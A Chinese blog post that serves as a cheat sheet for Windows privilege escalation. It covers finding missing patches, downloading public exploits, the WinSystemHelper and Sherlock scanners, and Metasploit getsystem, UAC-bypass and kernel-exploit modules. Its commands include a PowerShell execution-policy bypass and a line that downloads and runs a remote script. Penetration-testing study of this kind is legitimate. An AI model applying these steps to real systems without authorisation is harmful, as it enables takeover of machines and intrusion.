windows提权速查流程

最新推荐文章于 2024-05-07 19:35:23 发布
最新推荐文章于 2024-05-07 19:35:23 发布
阅读量492 收藏
点赞数
分类专栏: windows基础知识以及相关漏洞 网络安全相关 文章标签: 网络安全
原文链接:https://blog.csdn.net/Appleteachers/article/details/117523466
版权

windows提权速查流程

1.可利用漏洞信息收集

收集本机systeminfo中补丁信息

在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp

然后查询exp,选择对应的Exp下载运行即可。

https://i.hacking8.com/
https://github.com/SecWiki/windows-kernel-exploits

提权Exp的运行方式,一般有以下几种:

直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system
在WebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令
利用MSF等工具
C++源码,Python脚本,PowerShell脚本等特殊方式

2.WinSystemHelper

使用WinSystemHelper检查可利用的漏洞。该工具适合在任何Windows服务器上进行已知提权漏洞的检测

https://github.com/brianwrf/WinSystemHelper

上传WinSysHelper.bat、explt2003.txt、expgt2003.txt,运行bat查看结果

然后在可利用的Exp中任意下载一个并执行即可
3.Sherlock

Sherlock是在Windows下用于本地提权的PowerShell脚本
分析漏洞出漏洞后利用对应Exp即可

启动Powershell

$ powershell.exe -exec bypass

本地加载脚本

$ Import-Module Sherlock.ps1

远程加载脚本

$ IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

检查漏洞,Vulnstatus为Appears Vulnerable即存在漏洞

$ Find-AllVulns

4.msf中的提权方法

getsystem

meterpreter> getsystem
BypassUAC​​​​​​​

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

​​​​​​​

meterpreter> background  # 后台session 
msf> use exploit/windows/local/bypassuac
msf> set SESSION <session_id>

后台session时会返回session_id,如不清楚可以使用命令sessions -l

msf> run

内核提权​​​​​​

查询补丁

meterpreter> run post/windows/gather/enum_patches

[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

查询Exp

msf> use post/multi/recon/local_exploit_suggester 
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium 
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

原文链接:https://blog.csdn.net/Appleteachers/article/details/117523466

Bolgzhang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
提权扫描工具
qq_46258964的博客
06-23 674
1,Windows-Exploit-Suggester 使用Windows-Exploit-Suggester解析systeminfo https://github.com/AonCyberLabs/Windows-Exploit-Suggester 由于最新版的xlrd对xls的处理方式不同了,导致这个脚本有使用会报错,所以我们使用老版本的xlrd,记得是如下命令 pip2.7 install xlrd==1.2.0 2,使用Linux-Exploit-Suggester.sh寻找linux提权问题 下载
windows&linux;提权总结
04-24
windows&linux;提权总结,套路,套路,套路,套路套路,套路,套路,。
windows提权-快速查找exp
03-07
windows提权-快速查找exp
windows 提权
qq_63527808的博客
11-22 996
一、提权的常用方法。
一键解密,网络安全神器现已问世!
最新发布
weixin_43526443的博客
05-07 3935
这款工具是一款功能强大的网络安全综合工具,旨在为安全从业者、红蓝对抗人员和网络安全爱好者提供全面的网络安全解决方案。它集成了多种实用功能,包括解密、分析、扫描、溯源等,为用户提供了便捷的操作界面和丰富的功能选择。
Windows提权
05-22 442
提权的概念 提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。----百度百科,当然这里单指WEBshell格局小了。 拿下shell之后,首先要苟住对机器进行基本信息收集之后再进行提权,要注意主机是否安装主机安全设备、杀软等安全软件,防止被管理员发现告警信息,导致好不容易获取到的shell丢失。 Windows 提权 系统漏洞提权 系统漏洞提权,这种方式适用于Windows、Linux系统,针对系统存在漏洞又没有打补丁的情况进行
Windows API速查手册
03-09
Windows API 速查 手册 编程 Windows API 速查 手册 编程
Web设计的速查
03-02
PhotoshopPhotoshopCS3快捷键速查卡Downloads:PDF(Windows),PDF(Mac)关于调色板的一些热键(HTML)Photoshop工具栏速查(HTML)Photoshop套索工具速查Download:PDFPhotoshop笔刷工作速查Download:PDF颜色R
Windows Server 2003\2008本地提权 0day
06-09
Windows Server 2003、2008 内核溢出、本地提权 0day
蓝屏信息速查 BlueScreenView
03-01
这款名为BlueScreenView(蓝屏信息速查)的免费小软件能够分解出Windows发生蓝屏崩溃后生成的“minidump”文件,使其容易阅读,从而帮助用户找出问题的症结所在。 支持的操作系统:Windows XP, Windows Server 2003, ...
Windows提权EXP辅助工具——Windows-Exploit-Suggester
weixin_30254435的博客
03-25 504
在学习亮神的Gitbook渗透测试教程时,有两课讲到了windows环境下和linux环境下提权的exp,总结的非常全面,但是对于新手来说缺少下载地址和友好的检索,顿时产生了一个不错的想法,能不能写一个python脚本,根据输入的补丁号和操作系统后输出对应提权可用的exp,最好还有下载地址,无奈代码能力太差,所以万能的github大法,发现了一个不错的工具。 地址:https://gith...
linux提权检查工具
iteye_16188的博客
08-19 387
1. https://github.com/PenturaLabs/Linux_Exploit_Suggester用于检查各个版本Linux提权漏洞和提供source 2. http://pentestmonkey.net/tools/audit/unix-privesc-check
Windows提权辅助工具
LuckySec
04-24 992
0x01 工具介绍 该在线提权辅助工具收录了微软所有Windows权限提升以及命令执行资料,并实时更新,并且可以根据systeminfo信息找到未修补的漏洞和已经修补漏洞。 在线工具地址:https://i.hacking8.com/tiquan 0x02 工具使用 首先搜集Windows系统的补丁号或者systeminfo信息 然后将其systeminfo内容复制到在线辅助工具文本栏里 等待查询结果,即可看到目标系统可能存在的提权漏洞相关信息 ...
权限提升-Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选
siu~
03-23 1250
1、Web到Win-系统提权-土豆家族 2、Web到Win-系统提权-人工操作
Windows补丁查找及安装
Jian Sun_的博客
02-03 2454
Windows补丁查找及安装
Webshell版本windows提权EXP加强版
weixin_34208283的博客
01-27 339
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit原作者联系方式:taviso@sdf.lonestar.org 此版本以这位GOOGLE***高手Tavis Ormandy的大作为基础改写而成.修改部分如下: 1:根据作者个人遗憾的几点做了改进,避免了因NT系统...
Unix/Linux提权漏洞快速检测工具unix-privesc-check
weixin_33806914的博客
04-25 243
2019独角兽企业重金招聘Python工程师标准>>> ...
Windows系统文件速查宝典:必备故障排查指南
Windows系统文件速查手册》是一份针对Windows操作系统内部文件及其功能的详细指南,旨在帮助用户快速理解和定位系统中的关键文件,以便在遇到问题时能够准确判断和解决。手册按照字母顺序列出了众多系统文件及其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值